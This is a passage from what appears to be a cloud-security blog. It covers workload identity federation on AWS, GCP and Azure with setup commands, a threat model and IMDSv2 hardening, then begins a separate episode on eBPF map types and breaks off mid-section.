OIDC_ISSUER=$(aws eks describe-cluster \
  --name my-cluster \
  --query "cluster.identity.oidc.issuer" \
  --output text)

# Step 2: register this OIDC issuer with IAM
# (eksctl utils associate-iam-oidc-provider does this in one step and
#  computes the issuer CA thumbprint for you; IAM now also validates
#  well-known issuers against its own trusted CA list)
OIDC_HOST="${OIDC_ISSUER#https://}"   # strip the scheme
OIDC_HOST="${OIDC_HOST%%/*}"          # strip the /id/... path
aws iam create-open-id-connect-provider \
  --url "${OIDC_ISSUER}" \
  --client-id-list sts.amazonaws.com \
  --thumbprint-list "$(openssl s_client -connect "${OIDC_HOST}:443" \
      -servername "${OIDC_HOST}" </dev/null 2>/dev/null \
    | openssl x509 -fingerprint -sha1 -noout | cut -d= -f2 | tr -d ':')"

# Step 3: create an IAM role with a trust policy scoped to a specific service account
ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
OIDC_ID="${OIDC_ISSUER#https://}"

cat > irsa-trust.json << EOF
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": {
      "Federated": "arn:aws:iam::${ACCOUNT_ID}:oidc-provider/${OIDC_ID}"
    },
    "Action": "sts:AssumeRoleWithWebIdentity",
    "Condition": {
      "StringEquals": {
        "${OIDC_ID}:sub": "system:serviceaccount:production:app-backend",
        "${OIDC_ID}:aud": "sts.amazonaws.com"
      }
    }
  }]
}
EOF

aws iam create-role \
  --role-name app-backend-s3-role \
  --assume-role-policy-document file://irsa-trust.json

aws iam put-role-policy \
  --role-name app-backend-s3-role \
  --policy-name AppBackendPolicy \
  --policy-document file://app-backend-policy.json
# Step 4: annotate the Kubernetes service account with the role ARN
apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
  annotations:
    eks.amazonaws.com/role-arn: arn:aws:iam::123456789012:role/app-backend-s3-role

The EKS Pod Identity webhook injects two environment variables into any pod using this service account: AWS_WEB_IDENTITY_TOKEN_FILE pointing to a projected token, and AWS_ROLE_ARN. The AWS SDK reads these automatically. The application doesn’t know any of this is happening — it just calls S3 and it works, using credentials that were never stored anywhere and expire automatically.
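The SDK side of this is just environment inspection. A rough sketch of the relevant slice of the default credential chain (simplified; the real chain has more steps and different internals):

```python
def pick_credential_source(env):
    """Simplified model of how an AWS SDK decides where credentials come from.

    Static env keys win if present; otherwise the injected web-identity
    variables trigger AssumeRoleWithWebIdentity; otherwise fall through
    to the instance metadata service.
    """
    if "AWS_ACCESS_KEY_ID" in env:
        return "static env keys"
    if "AWS_WEB_IDENTITY_TOKEN_FILE" in env and "AWS_ROLE_ARN" in env:
        return "assume-role-with-web-identity"
    return "instance metadata"

# What the webhook-injected pod environment looks like (paths illustrative)
pod_env = {"AWS_WEB_IDENTITY_TOKEN_FILE": "/var/run/secrets/eks.amazonaws.com/serviceaccount/token",
           "AWS_ROLE_ARN": "arn:aws:iam::123456789012:role/app-backend-s3-role"}

print(pick_credential_source(pod_env))   # assume-role-with-web-identity
print(pick_credential_source({}))        # instance metadata
```

This is also why leftover static keys are dangerous during a migration: if a pod still has AWS_ACCESS_KEY_ID set, the SDK uses the key and silently ignores the web identity you just configured.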

The trust policy’s sub condition is the security boundary. system:serviceaccount:production:app-backend means: only pods in the production namespace using the app-backend service account can assume this role. A pod in a different namespace, even with the same service account name, gets a different sub claim and the assumption fails.

EKS Pod Identity — The Simpler Modern Approach

AWS released Pod Identity as a simpler alternative to IRSA. No OIDC provider setup, no manual trust policy with OIDC conditions:

# Enable the Pod Identity agent addon on the cluster
aws eks create-addon \
  --cluster-name my-cluster \
  --addon-name eks-pod-identity-agent

# Create the association — this replaces the OIDC trust policy setup
aws eks create-pod-identity-association \
  --cluster-name my-cluster \
  --namespace production \
  --service-account app-backend \
  --role-arn arn:aws:iam::123456789012:role/app-backend-s3-role

Same result, less ceremony. For new clusters, Pod Identity is the path I’d recommend. IRSA remains important to understand for the many existing clusters already using it.

IAM Roles Anywhere — For On-Premises Workloads

Not everything runs in Kubernetes. For on-premises servers and workloads outside AWS, IAM Roles Anywhere issues temporary credentials to servers that present an X.509 certificate signed by a trusted CA:

# Register your internal CA as a trust anchor
aws rolesanywhere create-trust-anchor \
  --name "OnPremCA" \
  --source sourceType=CERTIFICATE_BUNDLE,sourceData.x509CertificateData="$(base64 -w0 ca-cert.pem)"

# Create a profile mapping the CA to allowed roles
aws rolesanywhere create-profile \
  --name "OnPremServers" \
  --role-arns "arn:aws:iam::123456789012:role/OnPremAppRole" \
  --trust-anchor-arns "${TRUST_ANCHOR_ARN}"

# On the on-prem server — exchange the certificate for AWS credentials
aws_signing_helper credential-process \
  --certificate /etc/pki/server.crt \
  --private-key /etc/pki/server.key \
  --trust-anchor-arn "${TRUST_ANCHOR_ARN}" \
  --profile-arn "${PROFILE_ARN}" \
  --role-arn "arn:aws:iam::123456789012:role/OnPremAppRole"

The server’s certificate (managed by your internal PKI or an ACM Private CA) is the proof of identity. No access key distributed to the server — just a certificate that your CA signed and that you can revoke through your existing certificate revocation infrastructure.


GCP: Workload Identity for GKE

For GKE clusters, Workload Identity is enabled at the cluster level and creates a bridge between Kubernetes service accounts and GCP service accounts:

# Enable Workload Identity on the cluster
gcloud container clusters update my-cluster \
  --workload-pool=my-project.svc.id.goog

# Enable on the node pool (required for the metadata server to work)
gcloud container node-pools update default-pool \
  --cluster=my-cluster \
  --workload-metadata=GKE_METADATA

# Create the GCP service account for the workload
gcloud iam service-accounts create app-backend \
  --project=my-project

SA_EMAIL="app-backend@my-project.iam.gserviceaccount.com"

# Grant the GCP SA the permissions it needs
gcloud storage buckets add-iam-policy-binding gs://app-data \
  --member="serviceAccount:${SA_EMAIL}" \
  --role="roles/storage.objectViewer"

# Create the trust relationship: K8s SA → GCP SA
gcloud iam service-accounts add-iam-policy-binding "${SA_EMAIL}" \
  --role=roles/iam.workloadIdentityUser \
  --member="serviceAccount:my-project.svc.id.goog[production/app-backend]"
# Annotate the Kubernetes service account
apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
  annotations:
    iam.gke.io/gcp-service-account: app-backend@my-project.iam.gserviceaccount.com

When the pod makes a GCP API call using ADC (Application Default Credentials), the GKE metadata server intercepts the credential request. It validates the pod’s Kubernetes identity, checks the IAM binding, and returns a short-lived GCP access token. The GCP service account key file never exists. There’s nothing to protect, nothing to rotate, nothing to leak.


Azure: Workload Identity for AKS

Azure’s workload identity for Kubernetes replaced the older AAD Pod Identity approach — which required a DaemonSet, had known TOCTOU vulnerabilities, and was operationally fragile. The current implementation uses the OIDC pattern:

# Enable OIDC issuer and workload identity on the AKS cluster
az aks update \
  --name my-aks \
  --resource-group rg-prod \
  --enable-oidc-issuer \
  --enable-workload-identity

# Get the OIDC issuer URL for this cluster
OIDC_ISSUER=$(az aks show \
  --name my-aks --resource-group rg-prod \
  --query "oidcIssuerProfile.issuerUrl" -o tsv)

# Create a user-assigned managed identity for the workload
az identity create --name app-backend-identity --resource-group rg-identities
CLIENT_ID=$(az identity show --name app-backend-identity -g rg-identities --query clientId -o tsv)
PRINCIPAL_ID=$(az identity show --name app-backend-identity -g rg-identities --query principalId -o tsv)

# Grant the identity the access it needs
az role assignment create \
  --assignee-object-id "$PRINCIPAL_ID" \
  --role "Storage Blob Data Reader" \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-prod/providers/Microsoft.Storage/storageAccounts/appstore

# Federate: trust the K8s service account from this cluster
az identity federated-credential create \
  --name aks-app-backend-binding \
  --identity-name app-backend-identity \
  --resource-group rg-identities \
  --issuer "${OIDC_ISSUER}" \
  --subject "system:serviceaccount:production:app-backend" \
  --audience "api://AzureADTokenExchange"
apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
  annotations:
    azure.workload.identity/client-id: "CLIENT_ID_HERE"
---
apiVersion: v1
kind: Pod
metadata:
  labels:
    azure.workload.identity/use: "true"   # triggers token injection
spec:
  serviceAccountName: app-backend
  containers:
  - name: app
    image: my-app:latest
    # Azure SDK DefaultAzureCredential picks up the injected token automatically

Cross-Cloud Federation — When AWS Talks to GCP

The same OIDC mechanism works cross-cloud. An AWS Lambda or EC2 instance can call GCP APIs without any GCP service account key on the AWS side:

# GCP side: create a workload identity pool that trusts AWS
gcloud iam workload-identity-pools create "aws-workloads" --location=global

gcloud iam workload-identity-pools providers create-aws "aws-provider" \
  --workload-identity-pool="aws-workloads" \
  --account-id="AWS_ACCOUNT_ID"

# Bind the specific AWS role to the GCP service account
gcloud iam service-accounts add-iam-policy-binding SA_EMAIL \
  --role=roles/iam.workloadIdentityUser \
  --member="principalSet://iam.googleapis.com/projects/GCP_PROJ_NUM/locations/global/workloadIdentityPools/aws-workloads/attribute.aws_role/arn:aws:sts::AWS_ACCOUNT:assumed-role/MyAWSRole"

The AWS workload presents its STS-issued credentials to GCP’s token exchange endpoint. GCP verifies the AWS signature, checks the attribute mapping (only MyAWSRole from that AWS account), and issues a short-lived GCP access token. No GCP service account key is ever distributed to the AWS side.


The Threat Model — What Workload Identity Doesn’t Solve

Workload identity dramatically reduces the attack surface, but it doesn’t eliminate it:

┌──────────────────────────┬──────────────────────────────────┬──────────────────────────────────┐
│ Threat                   │ What Still Applies               │ Mitigation                       │
├──────────────────────────┼──────────────────────────────────┼──────────────────────────────────┤
│ Token theft from the     │ The projected token is readable  │ Short TTL (default 1h); tokens   │
│ container filesystem     │ with container filesystem access │ are audience-bound — a K8s token │
│                          │                                  │ can’t call Azure APIs            │
│ SSRF to metadata service │ An SSRF vulnerability can fetch  │ Enforce IMDSv2 on AWS; restrict  │
│                          │ credentials from the metadata    │ the metadata server on GKE/AKS   │
│                          │ endpoint                         │                                  │
│ Overpermissioned service │ Workload identity doesn’t        │ One SA per workload; review      │
│ account                  │ enforce least privilege — the SA │ permissions against actual usage │
│                          │ can still be over-granted        │                                  │
│ Trust policy too broad   │ OIDC trust policy allows any     │ Always pin to a specific SA name │
│                          │ service account in a namespace   │ in the sub condition             │
└──────────────────────────┴──────────────────────────────────┴──────────────────────────────────┘

The SSRF-to-metadata-service path deserves particular attention. IMDSv2 requires a PUT request to obtain a session token before any metadata can be read, which blocks most SSRF scenarios because a simple SSRF can only make GET requests. Enforce it:

# Enforce IMDSv2 at instance launch
aws ec2 run-instances \
  --metadata-options HttpTokens=required,HttpPutResponseHopLimit=1

# Enforce org-wide via SCP — no instance can launch without IMDSv2
{
  "Effect": "Deny",
  "Action": "ec2:RunInstances",
  "Resource": "arn:aws:ec2:*:*:instance/*",
  "Condition": {
    "StringNotEquals": {
      "ec2:MetadataHttpTokens": "required"
    }
  }
}

⚠ Production Gotchas

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 1 — Trust policy scoped to namespace, not service account ║
║                                                                      ║
║  A condition like "sub": "system:serviceaccount:production:*"        ║
║  grants any pod in the production namespace the ability to assume    ║
║  the role. A compromised or new workload in that namespace gets      ║
║  access automatically.                                               ║
║                                                                      ║
║  Fix: always pin the sub condition to the exact service account      ║
║  name. "system:serviceaccount:production:app-backend" — not a glob.  ║
╚══════════════════════════════════════════════════════════════════════╝
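A quick way to catch this in review is to scan trust policies for sub conditions that are not pinned to an exact service account. An illustrative sketch; StringLike permits wildcards, so any StringLike on sub is worth flagging alongside literal globs:

```python
def overly_broad_subjects(trust_policy):
    """Flag sub conditions that can match more than one service account."""
    flagged = []
    for stmt in trust_policy.get("Statement", []):
        conds = stmt.get("Condition", {})
        for op in ("StringEquals", "StringLike"):
            for key, value in conds.get(op, {}).items():
                # StringLike allows wildcards by definition; a '*' under
                # StringEquals is a literal but still suspicious
                if key.endswith(":sub") and ("*" in str(value) or op == "StringLike"):
                    flagged.append(f"{op} {key} = {value}")
    return flagged

# The namespace-wide glob from the gotcha above (hypothetical issuer ID)
bad = {"Statement": [{"Effect": "Allow",
                      "Condition": {"StringLike": {
                          "oidc.eks.example:sub": "system:serviceaccount:production:*"}}}]}

print(overly_broad_subjects(bad))   # the glob is flagged
```

Run it against every IRSA trust policy in the account; a pinned policy like the app-backend example earlier comes back clean, and every glob gets a human decision.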

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 2 — Shared service accounts across workloads             ║
║                                                                      ║
║  Reusing one service account for multiple workloads saves setup      ║
║  time and creates a lateral movement path. A compromised workload    ║
║  that shares a service account with a payment processor has payment  ║
║  processor permissions.                                              ║
║                                                                      ║
║  Fix: one service account per workload. The overhead is low.         ║
║  The blast radius reduction is significant.                          ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 3 — IMDSv1 still reachable after enabling IMDSv2        ║
║                                                                      ║
║  Enabling IMDSv2 on new instances doesn't affect existing ones.      ║
║  The SCP approach enforces it at the org level going forward, but    ║
║  existing instances need explicit remediation.                       ║
║                                                                      ║
║  Fix: audit existing instances for IMDSv1 exposure.                 ║
║  aws ec2 describe-instances --query                                  ║
║    "Reservations[].Instances[?MetadataOptions.HttpTokens!='required']║
║    .[InstanceId,Tags]"                                               ║
╚══════════════════════════════════════════════════════════════════════╝

Quick Reference

┌────────────────────────────────┬───────────────────────────────────────────────────────┐
│ Term                           │ What it means                                         │
├────────────────────────────────┼───────────────────────────────────────────────────────┤
│ Workload identity federation   │ OIDC-based exchange: runtime JWT → short-lived token  │
│ IRSA                           │ IAM Roles for Service Accounts — EKS + OIDC pattern   │
│ EKS Pod Identity               │ Newer, simpler IRSA replacement — no OIDC setup       │
│ GKE Workload Identity          │ K8s SA → GCP SA via workload pool + IAM binding       │
│ AKS Workload Identity          │ K8s SA → managed identity via federated credential    │
│ IAM Roles Anywhere             │ AWS temp credentials for on-prem via X.509 cert       │
│ IMDSv2                         │ Token-gated AWS metadata service — blocks SSRF        │
│ OIDC sub claim                 │ Workload's unique identity string — use for pinning   │
│ Projected service account token│ K8s-injected JWT — the OIDC token pods present to AWS │
└────────────────────────────────┴───────────────────────────────────────────────────────┘

Key commands:
┌────────────────────────────────────────────────────────────────────────────────────────┐
│  # AWS — list OIDC providers registered in this account                               │
│  aws iam list-open-id-connect-providers                                               │
│                                                                                        │
│  # AWS — list Pod Identity associations for a cluster                                 │
│  aws eks list-pod-identity-associations --cluster-name my-cluster                     │
│                                                                                        │
│  # AWS — verify what credentials a pod is actually using                              │
│  aws sts get-caller-identity   # run from inside the pod                              │
│                                                                                        │
│  # AWS — audit instances missing IMDSv2                                               │
│  aws ec2 describe-instances \                                                          │
│    --query "Reservations[].Instances[?MetadataOptions.HttpTokens!='required']          │
│    .[InstanceId]" --output text                                                        │
│                                                                                        │
│  # GCP — verify workload identity binding on a GCP service account                   │
│  gcloud iam service-accounts get-iam-policy SA_EMAIL                                  │
│                                                                                        │
│  # GCP — list workload identity pools                                                 │
│  gcloud iam workload-identity-pools list --location=global                            │
│                                                                                        │
│  # Azure — list federated credentials on a managed identity                           │
│  az identity federated-credential list \                                               │
│    --identity-name app-backend-identity --resource-group rg-identities                │
└────────────────────────────────────────────────────────────────────────────────────────┘

Framework Alignment

  • CISSP Domain 5 — Identity and Access Management: non-human identities dominate cloud environments; workload identity federation is the modern machine authentication pattern
  • CISSP Domain 1 — Security & Risk Management: static credential sprawl is a measurable, eliminable risk; workload identity removes it at the root
  • ISO 27001:2022 5.17 (Authentication information): managing machine credentials — workload identity replaces long-lived secrets with short-lived, environment-bound tokens
  • ISO 27001:2022 8.5 (Secure authentication): OIDC token exchange is the secure authentication mechanism for machine identities
  • ISO 27001:2022 5.18 (Access rights): service account provisioning and deprovisioning — workload identity ties access to the runtime environment, not a stored secret
  • SOC 2 CC6.1: workload identity federation is the preferred technical control for machine-to-cloud authentication
  • SOC 2 CC6.7: short-lived, audience-bound tokens restrict credential reuse across systems — addresses transmission and access controls

Key Takeaways

  • Static credentials for machine identities are the problem, not the solution — workload identity federation eliminates them at the root
  • The OIDC token exchange pattern is consistent across AWS (IRSA/Pod Identity), GCP (Workload Identity), and Azure (AKS Workload Identity) — learn one, the others are a translation
  • AWS EKS: use Pod Identity for new clusters; IRSA remains the pattern for existing ones — both eliminate static keys
  • GCP GKE: Workload Identity enabled at cluster level, SA annotation at the K8s service account level
  • Azure AKS: federated credential on the managed identity, azure.workload.identity/use: "true" label on pods
  • Cross-cloud federation works — an AWS IAM role can call GCP APIs without a GCP key file
  • Enforce IMDSv2 everywhere; pin OIDC trust conditions to specific service account names; apply least privilege to the underlying cloud identity

What’s Next

You’ve eliminated the static credential problem. The next question is: what happens when the IAM configuration itself is the vulnerability? The next episode goes into AWS IAM privilege-escalation attack paths — how iam:PassRole, iam:CreateAccessKey, and misconfigured trust policies turn IAM misconfigurations into full account compromise. If you’re designing or auditing cloud access control, you need to know these paths before an attacker finds them.

Next: AWS IAM Privilege Escalation: How iam:PassRole Leads to Full Compromise

Get EP08 in your inbox when it publishes → linuxcent.com/subscribe

eBPF Maps — The Persistent Data Layer Between Kernel and Userspace

Reading Time: 11 minutes

eBPF: From Kernel to Cloud, Episode 5
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types · eBPF Maps


TL;DR

  • eBPF programs are stateless — maps are where all state lives, between invocations and between kernel and userspace
    (“stateless” here means each program invocation starts with no memory of previous runs — like a function with no global variables)
  • Every production eBPF tool (Cilium, Falco, Tetragon, Datadog NPM) is a map-based architecture — bpftool map list shows you what it’s actually holding
  • Per-CPU maps eliminate write contention for high-frequency counters; the tool aggregates per-CPU values at export time
  • LRU maps handle unbounded key spaces (IPs, PIDs, connections) without hard errors when full — but eviction is silent, so size generously
  • Ring buffer (kernel 5.8+) is the correct event streaming primitive — Falco and Tetragon both use it
  • Map memory is kernel-locked and invisible to standard memory metrics — account for it explicitly on eBPF-heavy nodes
  • Pinned maps survive restarts; Cilium uses this for zero-disruption connection tracking through upgrades

The Big Picture

  HOW eBPF MAPS CONNECT KERNEL PROGRAMS TO USERSPACE TOOLS

  ┌─────────────────────────────────────────────────────────────┐
  │  Kernel space                                               │
  │                                                             │
  │  [XDP program]  [TC program]  [kprobe]  [tracepoint]        │
  │        │              │           │           │             │
  │        └──────────────┴───────────┴───────────┘             │
  │                              │                              │
  │                   bpf_map_update_elem()                     │
  │                              │                              │
  │                              ▼                              │
  │  ┌─────────────────────────────────────────────────────┐    │
  │  │             eBPF MAP (kernel object)                │    │
  │  │  hash · percpu_hash · lru_hash · ringbuf · lpm_trie │    │
  │  │  Lives outside program invocations.                 │    │
  │  │  Pinned maps (/sys/fs/bpf/) survive restarts.       │    │
  │  └────────────────────┬────────────────────────────────┘    │
  └───────────────────────│─────────────────────────────────────┘
                          │  read / write via file descriptor
                          ▼
  ┌─────────────────────────────────────────────────────────────┐
  │  Userspace tools                                            │
  │                                                             │
  │  Cilium agent  Falco engine  Tetragon  bpftool map dump     │
  └─────────────────────────────────────────────────────────────┘

eBPF maps are the persistent data layer between kernel programs and the tools that consume their output. eBPF programs fire and exit — there’s no memory between invocations. Yet Cilium tracks TCP connections across millions of packets, and Falco correlates a process exec from five minutes ago with a suspicious network connection happening now. This episode is about the mechanism that bridges stateless kernel programs and the stateful production tools you depend on — and understanding it changes what you see when you run bpftool map list.


I was trying to identify the noisy neighbor saturating a cluster’s egress link. I had an eBPF program loading cleanly, events firing, everything confirming it was working. But when I read back the per-port connection counters from userspace, everything was zero.

I spent an hour on it before posting to the BCC mailing list. The reply came back fast: eBPF programs don’t hold state between invocations. Every time the kprobe fires, the program starts fresh. The counter I was incrementing existed only for that single call — created, incremented to one, then discarded. On every single invocation. I was counting events one at a time, throwing the count away, and reading nothing.

That’s what eBPF maps solve.
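The bug from that story is easy to reproduce in miniature. In the sketch below, each "program invocation" is a fresh Python function call: a local counter is created, incremented, and discarded — exactly like eBPF program locals. A plain dict stands in for a BPF hash map, the state that outlives invocations:

```python
# The stateless-program bug in miniature.
from collections import defaultdict

def kprobe_no_map(port):
    count = 0           # fresh on every invocation — like eBPF locals
    count += 1
    return count        # always 1; the value dies here

conn_counts = defaultdict(int)   # stand-in for a BPF hash map

def kprobe_with_map(port):
    conn_counts[port] += 1       # the bpf_map_update_elem() equivalent

# The kprobe fires 1000 times.
for _ in range(1000):
    kprobe_no_map(443)
    kprobe_with_map(443)

# Userspace readback: without a map, nothing accumulated.
assert kprobe_no_map(443) == 1       # counted one event, threw it away
assert conn_counts[443] == 1000      # the map held the state
```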

Quick Check: What Maps Are Running on Your Node?

Before the map types walkthrough — see the live state of maps on any cluster node right now:

# SSH into a worker node, then:
bpftool map list

On a node running Cilium + Falco, you’ll see something like:

12: hash          name cilium_ct4_glo    key 24B  value 56B  max_entries 65536  memlock 5767168B
13: lpm_trie      name cilium_ipcache    key 40B  value 32B  max_entries 512000 memlock 327680B
14: percpu_hash   name cilium_metrics    key 8B   value 32B  max_entries 65536  memlock 2097152B
28: ringbuf       name falco_events      max_entries 8388608

Reading this output:
  • hash, lpm_trie, percpu_hash, ringbuf — the map type (each optimised for a different access pattern)
  • key 24B value 56B — sizes of a single entry’s key and value in bytes
  • max_entries — the hard ceiling; when the map is full, behaviour depends on type (see the LRU section below)
  • memlock — non-pageable kernel memory this map consumes (invisible to free and container metrics)

Not running Cilium? On EKS with aws-vpc-cni or on GKE with kubenet you’ll see far fewer maps here, because kube-proxy uses iptables rather than BPF maps. bpftool map list still works; you’ll just see fewer entries. On a pure iptables-based cluster, most of the maps you do see come from the kernel itself, not a CNI.

Maps Are the Architecture, Not an Afterthought

Maps are kernel objects that live outside any individual program invocation. They’re shared between multiple eBPF programs, readable and writable from userspace, and persistent for the lifetime of the map — which can outlive both the program that created them and the userspace process that loaded them.

Every production eBPF tool is fundamentally a map-based architecture:

  • Cilium stores connection tracking state in BPF hash maps
  • Falco uses ring buffers to stream syscall events to its userspace rule engine
  • Tetragon maintains process tree state across exec events using maps
  • Datadog NPM stores per-connection flow stats in per-CPU maps for lock-free metric accumulation

Run bpftool map list on a Cilium node:

$ bpftool map list
ID 12: hash          name cilium_ct4_glo    key 24B  value 56B   max_entries 65536
#      ^^^^           ^^^^^^^^^^^^^^^^       ^^^^^^   ^^^^^^^     ^^^^^^^^^^^^^^^^
#      type           map name               key size value size  max concurrent entries

ID 13: lpm_trie      name cilium_ipcache    key 40B  value 32B   max_entries 512000
#      longest-prefix-match trie — for IP address + CIDR lookups

ID 14: percpu_hash   name cilium_metrics    key 8B   value 32B   max_entries 65536
#      one copy of this map per CPU — no write contention for high-frequency counters

ID 28: ringbuf       name falco_events      max_entries 8388608
#                                           ^^^^^^^^^^^ 8MB ring buffer for event streaming

Connection tracking, IP policy cache, per-CPU metrics, event stream. Every one of these is a different map type, chosen for a specific reason.

Map Types and What They’re Actually Used For

Hash Maps

The general-purpose key-value store. A key maps to a value — lookup is O(1) average. Cilium’s connection tracking map (cilium_ct4_glo) is a hash map: the key is a 5-tuple (source IP, destination IP, ports, protocol), the value is the connection state.

$ bpftool map show id 12
12: hash  name cilium_ct4_glo  flags 0x0
        key 24B  value 56B  max_entries 65536  memlock 5767168B

The key 24B is the 5-tuple. The value 56B is the connection state record. max_entries 65536 is the upper bound — Cilium can track 65,536 active connections in this map before hitting the limit.

Hash maps are shared across all CPUs on the node. When multiple CPUs try to update the same entry simultaneously — which happens constantly on busy nodes — writes need to be coordinated. For most use cases this is fine. For high-frequency counters updated on every packet, it’s a bottleneck. That’s when you reach for a per-CPU hash map.

Where you see them: connection tracking, per-IP statistics, process-to-identity mapping, policy verdict caching.
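A connection-tracking hash map is easy to picture as a dict keyed by the 5-tuple. The sketch below mirrors the shape of cilium_ct4_glo (assumption: the real key and value are packed C structs, not Python tuples and strings):

```python
# A connection-tracking hash map in miniature: 5-tuple key → state value.
ct_map = {}   # stand-in for a BPF hash map

def track(src_ip, dst_ip, src_port, dst_port, proto, state):
    key = (src_ip, dst_ip, src_port, dst_port, proto)   # the 5-tuple
    ct_map[key] = state                                 # O(1) average update

track("10.0.1.15", "10.0.2.20", 48212, 443, "tcp", "ESTABLISHED")
track("10.0.1.15", "10.0.2.20", 48213, 443, "tcp", "SYN_SENT")

# Same 5-tuple → same entry; lookup is a single hash probe.
assert ct_map[("10.0.1.15", "10.0.2.20", 48212, 443, "tcp")] == "ESTABLISHED"
assert len(ct_map) == 2   # different source ports = different connections
```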

Per-CPU Hash Maps

Per-CPU hash maps solve the write coordination problem by giving each CPU its own independent copy of every entry. There’s no sharing, no contention, no waiting — each CPU writes its own copy without touching any other.

The tradeoff: reading from userspace means collecting one value per CPU and summing them up. That aggregation happens in the tool, not the kernel.

# Cilium's per-CPU metrics map — one counter value per CPU
bpftool map dump id 14
key: 0x00000001
  value (CPU 00): 12345
  value (CPU 01): 8901
  value (CPU 02): 3421
  value (CPU 03): 7102
# total bytes for this metric: 31769

Cilium’s cilium_metrics map uses this pattern for exactly this reason — it’s updated on every packet across every CPU on the node. Forcing all CPUs to coordinate writes to a single shared entry at that rate would hurt throughput. Instead: each CPU writes locally, Cilium’s userspace agent sums the values at export time.

Where you see them: packet counters, byte counters, syscall frequency metrics — anywhere updates happen on every event at high volume.
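The readback pattern above is just a sum at export time. Using the per-CPU values from the bpftool dump:

```python
# Per-CPU map readback: one value per CPU, aggregated in userspace.
percpu_values = {0: 12345, 1: 8901, 2: 3421, 3: 7102}   # CPU id → counter

# Each CPU incremented its own copy with no coordination; the tool
# sums the copies only when exporting the metric.
total = sum(percpu_values.values())
assert total == 31769   # matches the dump above
```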

LRU Hash Maps

LRU hash maps add automatic eviction. Same key-value semantics as a regular hash map, but when the map hits its entry limit, the least recently accessed entry is dropped to make room for the new one.

This matters for any map tracking dynamic state with an unpredictable number of keys: TCP connections, process IDs, DNS queries, pod IPs. Without LRU semantics, a full map returns an error on insert — and in production, that means your tool silently stops tracking new entries. Not a crash, not an alert — just missing data.

Cilium’s connection tracking map is LRU-bounded at 65,536 entries. On a node handling high-connection-rate workloads, this can fill up. When it does, Cilium starts evicting old connections to make room for new ones — and if it’s evicting too aggressively, you’ll see connection resets.

# Check current CT map usage vs its limit
bpftool map show id 12
# max_entries tells you the ceiling
# count entries to see current usage
bpftool map dump id 12 | grep -c "^key"

Size LRU maps at 2× your expected concurrent active entries. Aggressive eviction under pressure introduces gaps — not crashes, but missing or incorrect state.

Where you see them: connection tracking, process lineage, anything where the key space is dynamic and unbounded.
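The "silent" part of LRU eviction is the operational trap, and it's worth seeing directly. The sketch below stands in an OrderedDict for an LRU hash map with max_entries=3: when a fourth key arrives, the least recently accessed entry vanishes without any error being returned:

```python
# Silent LRU eviction in miniature.
from collections import OrderedDict

MAX_ENTRIES = 3
lru = OrderedDict()

def lru_update(key, value):
    if key in lru:
        lru.move_to_end(key)      # access refreshes recency
    elif len(lru) >= MAX_ENTRIES:
        lru.popitem(last=False)   # evict least recently used — silently
    lru[key] = value

for conn in ("a", "b", "c"):
    lru_update(conn, "ESTABLISHED")
lru_update("a", "ESTABLISHED")    # touch "a" so "b" is now the oldest
lru_update("d", "SYN_SENT")       # map full: "b" is evicted, no error

assert "b" not in lru             # the tool never hears about this
assert set(lru) == {"a", "c", "d"}
```

A plain hash map would have errored on the insert of "d"; the LRU variant succeeded and quietly dropped "b" — which in production is a connection your tool stopped tracking.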

Ring Buffers

Ring buffers are how eBPF tools stream events from the kernel to a userspace consumer. Falco reads syscall events from a ring buffer. Tetragon streams process execution and network events through ring buffers. The pattern is the same across all of them:

kernel eBPF program
  → sees event (syscall, network packet, process exec)
  → writes record to ring buffer
  → userspace tool reads it and processes (Falco rules, Tetragon policies)

What makes ring buffers the right primitive for event streaming:

  • Single buffer shared across all CPUs — unlike the older perf_event_array approach which required one buffer per CPU, a ring buffer is one allocation, one file descriptor, one consumer
  • Lock-free — the kernel writes, the userspace tool reads, they don’t block each other
  • Backpressure when full — if the userspace tool can’t keep up, new events are dropped rather than queued indefinitely. The tool can detect and count drops. Falco reports these as Dropped events in its stats output.

# Falco's ring buffer — 8MB
bpftool map list | grep ringbuf
# ID 28: ringbuf  name falco_events  max_entries 8388608

8,388,608 bytes = 8MB. That’s the buffer between Falco’s kernel hooks and its rule engine. If a burst of syscall activity outpaces Falco’s rule evaluation, events that don’t fit in that window are dropped and lost.

Sizing matters operationally. Too small and you drop events during normal burst. Too large and you’re holding non-pageable kernel memory that doesn’t show up in standard memory metrics.

# Check Falco's drop rate
falcoctl stats
# or check the Falco logs
journalctl -u falco | grep -i "drop"

Most production deployments run 8–32MB. Start at 8MB, monitor drop rates under load, size up if needed.

Where you see them: Falco event streaming, Tetragon audit events, any tool that needs to move high-volume event data from kernel to userspace.

Array Maps

Array maps are fixed-size, integer-indexed, and entirely pre-allocated at creation time. Think of them as lookup tables with integer keys — constant-time access, no hash overhead, no dynamic allocation.

Cilium uses array maps for policy configuration: a fixed set of slots indexed by endpoint identity number. When a packet arrives and Cilium needs to check policy, it indexes into the array directly rather than doing a hash lookup. For read-heavy, write-rare data, this is faster.

The constraint: you can’t delete entries from an array map. Every slot exists for the lifetime of the map. If you need to track state that comes and goes — connections, processes, pods — use a hash map instead.

Where you see them: policy configuration, routing tables with fixed indices, per-CPU stats indexed by CPU number.
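The array-map tradeoff — direct indexing, every slot pre-allocated, no deletion — reduces to a fixed-size list (assumption: illustrative shape only; real policy values are packed structs, not dicts):

```python
# An array map in miniature: fixed-size, integer-indexed, pre-allocated.
MAX_ENTRIES = 8
policy = [None] * MAX_ENTRIES   # every slot exists for the map's lifetime

# Slot i holds policy for endpoint identity i — no hashing on the hot path.
policy[3] = {"ingress": "allow", "egress": "deny"}

def lookup(identity):
    return policy[identity]     # direct index — O(1), no hash probe

assert lookup(3)["egress"] == "deny"
assert lookup(5) is None        # slot exists, but holds no policy yet
```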

LPM Trie Maps

LPM (Longest Prefix Match) trie maps handle IP prefix lookups — the same operation that a hardware router does when deciding which interface to send a packet out of.

